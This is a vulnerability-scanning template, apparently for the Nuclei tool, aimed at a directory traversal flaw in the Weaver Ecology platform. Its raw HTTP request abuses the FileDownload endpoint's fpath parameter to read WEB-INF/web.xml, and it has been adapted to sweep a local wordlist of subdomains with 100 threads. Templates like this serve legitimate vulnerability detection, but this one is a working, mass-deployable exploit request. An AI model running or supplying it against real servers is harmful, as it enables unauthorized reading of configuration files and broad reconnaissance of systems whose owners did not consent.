id: ecology-filedownload-directory-traversal
info:
  name: Ecology Directory Traversal
  author: princechaddha
  severity: medium
  tags: ecology,lfi

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<url-pattern>/weaver/"
        part: body
